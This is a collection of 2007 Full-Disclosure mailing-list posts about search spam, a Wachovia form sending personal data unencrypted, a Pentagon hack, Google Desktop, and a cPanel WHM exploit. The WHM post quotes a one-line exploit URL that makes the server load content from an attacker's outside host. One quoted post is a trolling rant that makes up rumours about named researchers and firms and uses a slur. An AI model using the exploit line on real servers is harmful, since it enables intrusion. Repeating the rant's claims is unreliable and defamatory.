[Full-disclosure] CN spam links in Google and Yahoo
http://news.yahoo.com/s/zd/20070924/tc_zd/215816 I've seen this a lot lately, and I don't see how these sites were allowed. Is there anyone here who can shed some light on this? Steve Excerpt: A reader, Courtney Cox (no relation to the actress), recently pointed out to me that the top results of recent complex Google searches turned out to be inane Chinese sites that were not even parking sites, just an assortment of keywords that somehow got indexed and brought to the top of the results list. After seeing a few of these sites, I have to wonder what's going on. Is it sabotage? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Wachovia Bank website sends confidential information
The link now redirects to an HTTPS page -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Bob Toxen Sent: Tuesday, July 10, 2007 8:20 PM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Wachovia Bank website sends confidential information Wachovia Bank website sends confidential information (social security numbers, phone number, address, etc.) over the Internet without encryption. Horizon Network Security Security Advisory 07/10/2007 http://VerySecureLinux.com/ Jul 10, 2007 I. BACKGROUND Wachovia Bank's official web site offers the following URL to allow its customers to change their privacy preferences: http://www.wachovia.com/privacy Wachovia also notified its customers by U.S. Mail that they can use that same URL besides. That URL has a link to the following to actually change one's preferences: http://www.wachovia.com/personal/forms/privacy_optout Unfortunately, that page appears to be an ordinary HTML form whose filled out data then is transmitted via the post method to an http (not https) URL. III. ANALYSIS We inspected the page's source via our Opera browser. (We did not sniff the web traffic so we are not absolutely sure that there is not some hidden encryption method, though there appears to be none.) IV. DETECTION It is trivial to inspect the page source or sniff the data to demonstrate the problem. The problem has not been corrected. V. WORKAROUND Use a method other than their web site to exercise one's preferences. VI. VENDOR RESPONSE The vendor (Wachovia Bank) was notified via their customer service phone number on June 25. We were transferred to web support. The person answering asked us to FAX the details to her and we did so, also on June 25. We explained that we were reporting a severe security problem on their web site. We stated that that if we did not hear back from them within 7 days and the problem was not fixed by then that we would post the problem on the Full Disclosure list, following accepted industry practice. To date we have received no response and the problem remains unfixed. VII. CVE INFORMATION There is no CVE number. VIII. DISCLOSURE TIMELINE 06/25/2007 Initial vendor notification 06/25/2007 Vendor requested FAXed details 06/25/2007 Details FAXed to vendor 07/20/2007 No vendor response 07/20/2007 Public disclosure on this Full Disclosure list IX. CREDIT This problem was discovered by Bob Toxen, one of our engineers. X. LEGAL NOTICES Copyright C 2007 Horizon Network Security. All rights reserved. Permission is granted for the redistribution of this alert electronically. It may not be edited without the express written consent of Horizon Network Security. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing, based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition and waiving of the right to any action against Horizon Network Security or its employees or contractors. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. We believe Wachovia Bank is obligated by California's security breach disclosure laws to notify its California customers who may have used this form and the State of California. Other jurisdictions also may have notification requirements. Bob Toxen, Horizon Network Security http://www.verysecurelinux.com [Network Linux/Unix Security Consulting] http://www.realworldlinuxsecurity.com [Our 5* book: Real World Linux Security] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- No virus found in this incoming message. Checked by AVG Free Edition. Version: 7.5.476 / Virus Database: 269.10.2/893 - Release Date: 7/9/2007 5:22 PM ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)
Simon, That happened back in June even the article is dated June 21. It is funny however, that the person quoted in the transcripts of the press conference said he doesn't use email. Steve _ From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Simon Smith Sent: Monday, July 02, 2007 11:07 PM To: secure poon; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time) Old... As in you have no concept of time because it just came out? Or old.. As in you knew about this before anyone else because you are awesome? On 7/2/07 10:12 PM, secure poon [EMAIL PROTECTED] wrote: old news.. On 7/2/07, Simon Smith [EMAIL PROTECTED] wrote: Oh... And the URL would be helpful. :P http://www.computerworld.com/action/article.do?command=viewArticleBasic http://www.computerworld.com/action/article.do?command=viewArticleBasicart i arti http://www.computerworld.com/action/article.do?command=viewArticleBasicart i http://www.computerworld.com/action/article.do?command=viewArticleBasicamp ;arti cleId=9025442source=NLT_VVRnlid=37 On 7/2/07 7:20 PM, Simon Smith [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: So they interview a non-technical, non-email using person about a hack on the pentagon? *scratches head* SNOsoft Research Team http://snosoft.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ http://secunia.com/ http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ _ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDEFENSE VCP Challenge and botnet technologies
Wow What is with all the junk mail over the last few days on the list? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED] Sent: Sunday, May 20, 2007 7:16 PM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] iDEFENSE VCP Challenge and botnet technologies Good evening list members, Here is Larry Seltzer, your beloved on-field journalist reporting about the latest iDEFENSE challenge. An internal source who wishes to remain anonymous, provided information about possible bankruptcy of the VA-based cyberintelligence company, which offers monetary rewards for exploits, vulnerability information (Cross Site Scripting, LD_PRELOAD mis-use and VCP member list leakage issues). The confidential information shows certain inconsistencies in the financial department, possibly caused by the increasing money laundering crime from eGold and the other payment methods they accept. Anonymous sources comment that the company could be investing in pleasing slave Russian wifes since December of past year, with the departure of Richard Johnson and Pedram Amini (working at Microsoft and 3Com's ZDI, respectively). The remaining employees are known to have leaked CANVAS exploits as their own, causing major struggle in the Miami-based basement of the ImmunitySec team (which I hate so much, due to my affiliations with Matasano and some old @Stake people). This all might be the cause for the low prices offered by the continuous VCP challenges that the company launches on quarterly basis. The current one, offering as much as 16K USD dollars for flaws in OpenSSH, Apache, etc. Security experts from all over the world, consider the price value fair after rumors of potential pre-authentication flaws in the listed applications. Possible reasons include the retirement of GOBBLES Security, the groundbreaking revelations of the well known Dr. Neal Krawetz, the relaunch of SNOSOFT or even the raising of a new neo-luddite terrorist organization known as The Rogue Parrot Squadron, which could be linked to the tsunami disasters and 11th September. The FBI is reportedly investigating a security compromise of the systems used by the Gibson Research Corporation to host and sponsor the OpenBSD project, after DARPA stopped their funding (due to Theo De Raadt's comments to a Calgary based publication, regarding the War on Terror and gay marriages involving parrot sex and plastic surgery). This could be connected to the aforementioned underground neo-luddite organizations as well as the mysterious Internet identity known as n3td3v or it's counterpart, v3dt3n. In a conference call with Gandhi Evron, details about unsuspected botnets taking over control of Israeli nuclear facilities have been made available. A crack commando lead by Gandhi (who showed up in boxing gloves and elastic pants) managed to destroy an Iranian building complex used to conduct Denial of Service attacks against str0ke's private IRC intelligence service. Other sources confirm the compromise of individuals connected to the kidnapping of the world most well known whitehat expert, Andre Protas, who still works at eEye and obtains IDA Pro bulk licenses (albeit Ilfak Guilfanov publicly refuses to support him) for the now infamous CRACKlab.ru Similar conditions seem to surround GOBBLES Security operatives, after they were forced out of retirement by the Krawetz HackerFactor gang (in retardement since circa 100 years ago). Anonymous sources agree that this message will be flagged as 'Made in GOBBLES, 100% Mighty Turkey meat' by the well known Doctor. Rumors say he will soon move to a remote, lone Island in the middle of nowhere, to create a new race portraying thick nerdy glasses, fat faces and a desperate need of publishing utterly scientifically-flawed crap in security conferences, forums, blogs and Ranum's podcast. Finally, Matasano LLC., managed to make a world out of a single Quicktime exploit. This crack commando, known for bashing the LMH/IPU identity (known to be a group of desperate gangsters willing to do real mayhem over whitehats' wifes) arguing they are publicity stunts. Drugs must be working, meds still in pharmacy. Anonymous sources comment that this desperate move for publicity might be a sign of serious financial problems in the consulting firm, which is being managed by a real moron from outer-space, Thomas P-ee-tacek (phonetic emphasis is mine). Known for publishing an IDS evasion paper circa 10 years ago, he possesses strong management skills, as well as a talent for pissing off the wrong people. He also forgot that IDS evasion is more than your own version of 'hping'. They were also stupid enough for getting as much as 10K USD from the ZDI, when they could have sold it to iDEFENSE for a higher value and fingerprinting. The consulting firm denied negotiations with Apple Computer Inc. for a possible Leopard-related contract, which could explain the absolute lameness and faggotry shown in
Re: [Full-disclosure] Overtaking Google Desktop
Oh no!! That would mean he fully disclosed his passwords to full disclosure. Quick! Yair! Danny! Change your passwords! The evil music has started playing. -Steve -Original Message- From: Michal Zalewski [mailto:[EMAIL PROTECTED] Sent: Thursday, February 22, 2007 2:25 AM To: Steve Ragan Cc: 'Steven Scheffler'; 'pdp (architect)'; 'Yair Amit'; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Overtaking Google Desktop On Thu, 22 Feb 2007, Steve Ragan wrote: Yea he uses it later in the video, you see him pull it up in the attack, and read it. One would assume it is fake. [lights dim, sinister accords play] ...OR IS IT? /mz -- No virus found in this incoming message. Checked by AVG Free Edition. Version: 7.5.441 / Virus Database: 268.18.3/696 - Release Date: 2/21/2007 3:19 PM -- No virus found in this outgoing message. Checked by AVG Free Edition. Version: 7.5.441 / Virus Database: 268.18.3/696 - Release Date: 2/21/2007 3:19 PM ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] WHM Exploit question
Is this one of the items patched in the recent update to WHM? I see no info about it anywhere on the web or the Cpanel forums. Is this a new 0-Day and if so does anyone know a security contact for Cpanel? Using the forum, or general address are worthless at times. Thanks Steve Exploit below: name : web host manager vendor : cpanel.net by : s3rv3r_hack3r (ali [at] hackerz [dot] ir) web-site : www.hackerz.ir - ali.hackerz.ir exploit: http://domain.com:2086/scripts2/objcache?obj=http://www.hackerz.ir/? -- No virus found in this outgoing message. Checked by AVG Free Edition. Version: 7.5.432 / Virus Database: 268.17.29/673 - Release Date: 2/6/2007 5:52 PM ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/